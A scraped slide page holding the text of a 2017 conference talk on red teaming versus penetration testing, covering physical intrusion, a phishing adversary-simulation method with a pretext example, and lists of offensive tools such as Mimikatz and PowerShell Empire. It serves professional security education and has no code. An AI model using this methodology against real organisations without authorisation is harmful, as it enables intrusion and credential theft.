Software Security Initiative Capabilities: Where Do I Begin? Software Security Initiative Capabilities: Where Do I Begin?
Software Security Initiative Capabilities: Where Do I Begin?
 
Incident response before:after breach
Incident response before:after breachIncident response before:after breach
Incident response before:after breach
 
FUEL_USERS_GROUP
FUEL_USERS_GROUPFUEL_USERS_GROUP
FUEL_USERS_GROUP
 
Secure 360 adversary simulation
Secure 360 adversary simulationSecure 360 adversary simulation
Secure 360 adversary simulation
 
2019 FRSecure CISSP Mentor Program: Class Ten
2019 FRSecure CISSP Mentor Program: Class Ten2019 FRSecure CISSP Mentor Program: Class Ten
2019 FRSecure CISSP Mentor Program: Class Ten
 
Conf 2019 - Workshop: Liam Glanfield - know your threat actor
Conf 2019 - Workshop: Liam Glanfield - know your threat actorConf 2019 - Workshop: Liam Glanfield - know your threat actor
Conf 2019 - Workshop: Liam Glanfield - know your threat actor
 
Zen and the art of Security Testing
Zen and the art of Security TestingZen and the art of Security Testing
Zen and the art of Security Testing
 
Defending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricalityDefending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricality
 

More from Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE

金融ISAC アニュアルカンファレンス 2020:Intelligence Driven Securityの「ことはじめ」
金融ISAC アニュアルカンファレンス 2020:Intelligence Driven Securityの「ことはじめ」金融ISAC アニュアルカンファレンス 2020:Intelligence Driven Securityの「ことはじめ」
金融ISAC アニュアルカンファレンス 2020:Intelligence Driven Securityの「ことはじめ」Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE
 
Internet Week 2019:D2-3 攻撃者をあぶり出せ!! プロアクティブなセキュリティアプローチ
Internet Week 2019:D2-3 攻撃者をあぶり出せ!! プロアクティブなセキュリティアプローチInternet Week 2019:D2-3 攻撃者をあぶり出せ!! プロアクティブなセキュリティアプローチ
Internet Week 2019:D2-3 攻撃者をあぶり出せ!! プロアクティブなセキュリティアプローチTomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE
 

More from Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE (6)

Internet Week 2020:C12 脅威インテリジェンスの実践的活用法
Internet Week 2020:C12 脅威インテリジェンスの実践的活用法Internet Week 2020:C12 脅威インテリジェンスの実践的活用法
Internet Week 2020:C12 脅威インテリジェンスの実践的活用法
 
金融ISAC アニュアルカンファレンス 2020:Intelligence Driven Securityの「ことはじめ」
金融ISAC アニュアルカンファレンス 2020:Intelligence Driven Securityの「ことはじめ」金融ISAC アニュアルカンファレンス 2020:Intelligence Driven Securityの「ことはじめ」
金融ISAC アニュアルカンファレンス 2020:Intelligence Driven Securityの「ことはじめ」
 
Internet Week 2019:D2-3 攻撃者をあぶり出せ!! プロアクティブなセキュリティアプローチ
Internet Week 2019:D2-3 攻撃者をあぶり出せ!! プロアクティブなセキュリティアプローチInternet Week 2019:D2-3 攻撃者をあぶり出せ!! プロアクティブなセキュリティアプローチ
Internet Week 2019:D2-3 攻撃者をあぶり出せ!! プロアクティブなセキュリティアプローチ
 
CISO Mind Map v10(日本語版)
CISO Mind Map v10(日本語版)CISO Mind Map v10(日本語版)
CISO Mind Map v10(日本語版)
 
Internet Week 2018:D2-3 丸ごと分かるペネトレーションテストの今
Internet Week 2018:D2-3 丸ごと分かるペネトレーションテストの今Internet Week 2018:D2-3 丸ごと分かるペネトレーションテストの今
Internet Week 2018:D2-3 丸ごと分かるペネトレーションテストの今
 
The Social-Engineer Village at DEF CON 24 : Does Cultural Differences Become ...
The Social-Engineer Village at DEF CON 24 : Does Cultural Differences Become ...The Social-Engineer Village at DEF CON 24 : Does Cultural Differences Become ...
The Social-Engineer Village at DEF CON 24 : Does Cultural Differences Become ...
 

Recently uploaded

Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesZilliz
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 

Recently uploaded (20)

Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector Databases
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 

[AVTOKYO 2017] What is red team?

  • 1. What is Red Team Service? ~Latest Penetration Test Trends in U.S.~ TOMOHISA ISHIKAWA scientia.admin@gmail.com www.scientia-security.org
  • 2. $$ WHO AM I ?  Tomohisa Ishikawa • Security Consultant (9 years experience) • Specialized Area • Penetration Test, IR, Security Consultation, Vulnerability Management, Awareness, Training, Global Security Management… • Various Speaker Experience • SANSFIRE 2011 & 2012, DEF CON 24 SE Village, LASCON 2016, BSides Philly 2017 • Certification Junkie • CISSP, CSSLP, CISA, CISM, CFE, GPEN, GWAPT, GXPN, GWEB, GSNA, GREM, GCIH
  • 3. Objective  Sharing One Year Experience in security team of U.S. insurance company  Understanding difference of Methodology • Traditional “Penetration Test” vs. “Red Team”
  • 5.
  • 6.
  • 7.
  • 8.
  • 9. 日本で言うペネトレーションテストって… Penetration Test in Japan is …  某L社とか某N社のページを見てみると.. Let’s see HP of N company, L company, M company… • Webセキュリティ診断サービス (Web Application Testing) • プラットフォーム診断サービス (Platform Testing) • 標的型攻撃診断サービス(メール訓練サービス・出口対策検証) • 無線LAN診断サービス • DDoS体制検証サービス  安全第一!! Safety of system is First Priority.  ※ ちなみにセキュリティ診断とペネトレーションテストをほぼ同じ意味で使いますが、宗教上の 理由でこの二つを一緒に語ることが許せない人とは適当に読み替えてください。
  • 12.
  • 13. What is “Red Team”?  もともと、諜報機関で生まれた概念 Originally, it is from intelligence community  敵の観点から作戦を検証したり、取得した情報の信憑性を批判的に 検証するチームのこと Verify strategies or information from adversary view point • Devil‘s Advocate(悪魔の弁護人) • CIA Red Cell
  • 14. What is the difference btw “Red Team” and “Pen Test”? ⇒ Coverage is different!! Digital Physical Social • Web Application Testing • Platform Testing • APT Simulation • APT Mail Awareness training • Vishing(Voice Phishing) • OSINT • Tail Gating • Impersonation • ID Card Cloning • Physical Access to box • Elevator Hacking • Physical Control Bypass
  • 15.
  • 16.
  • 17.  According to Gartner… • Long Term Challenge (NOT point-in-time assessment) • より長期的にテストを実施。実施時間も24時間いつでも実施する. • Defense Coordination • Blue Teamの機能も含めて評価を行い、改善につなげる。 • Adversary Simulation • 攻撃者そのものの観点から実施する。(3つの観点の融合) • Controlled but Real Intrusion What is the difference btw “Red Team” and “Pen Test”? ⇒ Different Feature
  • 18. Case 1: Physical Penetration Test
  • 19.  Objective • どこまで内部侵入して情報が取れるのか? Is it possible to bypass physical access control?  Methodology • Breaking Lock (Picking, impassioning, Bypassing) • Elevator Hacking • RFID Cloning • Social Engineering Physical Penetration Test
  • 20. Case 2: APT Adversary Simulation Service
  • 21.  SLA of APT Adversary Simulation Service is following. • Awareness Phishing • Penetration Test Phishing • Red Team Phishing 標的型攻撃サービス APT Adversary Simulation Service
  • 22.  Attempting attacks as same as “Japan Pension Service” • Following Cyber Kill Chain • OSINT & SOCMINT • Selecting 2~3 targets, and sending attached email • Exploitation • Using “Fresh” vulnerability & Exploit • Post Exploitation with PowerShell • Password Cracking with GPU • Lateral Movement & Reaching out “Treasures” Red Team Phishing
  • 23. OSINT Example  Check LinkedIn and find out target  Analyzing Twitter with SOCMINT Tools • Target has a tendency to buy shoes in apparel shop • Sending Coupon by pretending as appeal shop
  • 24. TOOLS  OSINT • Maltago https://www.paterva.com/web7/ • FOCA https://www.elevenpaths.com/labstools/foca/index.html • SpiderFoot http://www.spiderfoot.net/ • Discovery Script https://github.com/leebaird/discover • Recon-ng https://bitbucket.org/LaNMaSteR53/recon-ng • Cymon https://cymon.io/ • WeLink https://welink.com/dashboard/ • GEOFEEDIA https://geofeedia.com/ • ECHOSEC https://www.echosec.net/
  • 25. TOOLS  OTHER TOOLS (Part of them is experimental) • GoPhish https://getgophish.com/ • Social Engineering Toolkit in Kali Linux • Cobalt Strike https://www.cobaltstrike.com/ • Mimikatz https://github.com/gentilkiwi/mimikatz • Responder https://github.com/SpiderLabs/Responder • IPMI http://fish2.com/ipmi/remote-pw-cracking.html • MITM Framework https://github.com/byt3bl33d3r/MITMf • Spray WMI https://github.com/trustedsec/spraywmi
  • 26.
  • 27.
  • 28.
  • 29. TOOLS  PowerShell Tools • PowerShell Empire https://github.com/EmpireProject/Empire • EmPyre (Python) https://github.com/EmpireProject/EmPyre • PowerSploit https://github.com/PowerShellMafia/PowerSploit • Including PowerView・Invoke-Mimikatz・PowerUp • Veil Framework https://www.veil-framework.com/ • Nishang https://github.com/samratashok/nishang • Invoke-Obfuscation https://github.com/danielbohannon/Invoke-Obfuscation • PS Attack https://github.com/jaredhaight/psattack • NaishoDeNusumu https://github.com/3nc0d3r/NaishoDeNusumu • BloodHound https://github.com/BloodHoundAD/BloodHound
  • 30.
  • 31.
  • 32. Resource  Great Presentation • AD Security https://adsecurity.org/ • All presentation is awesome • Adversarial Post-Exploitation: Lessons From The Pros • https://www.youtube.com/watch?v=x3crG-hM9sc • A Year in the Empire • https://www.youtube.com/watch?v=ngvHshHCt_8 • PowerShell Secrets and Tactics • https://www.youtube.com/watch?v=EQv4bJnCw8M • Introducing PowerShell into your Arsenal with PS>Attack • https://www.youtube.com/watch?v=mPckt6HQPsw • Invoke-Obfuscation: PowerShell obFUsk8tion Techniques • https://www.youtube.com/watch?v=P1lkflnWb0I
  • 33. From Blue Team Side  以下が本当に重要!! • Full Spectrum Visibility (完全な可視化) • Targeted Containment (標的型封じ込め)  EDR (Endpoint Detection & Response) • Ex) Tanium, Fidelis, Carbon Black, FireEye, Crowd Strike, Red Cloak, Cyber Reason…
  • 34. Wrap-Up  “Red team” is U.S. trends  Focus on comprehensive test
  • 35. Thank You!!  If you have any questions, please feel free to contact me Contact Info • Email scientia.admin@gmail.com • JP Blog www.scientia-security.org
  • 37. Digital Penetration Test Certification  Certification for Penetration Tester • CEH (by EC-Council) • GIAC (by SANS) • OSCP (by Offensive Security)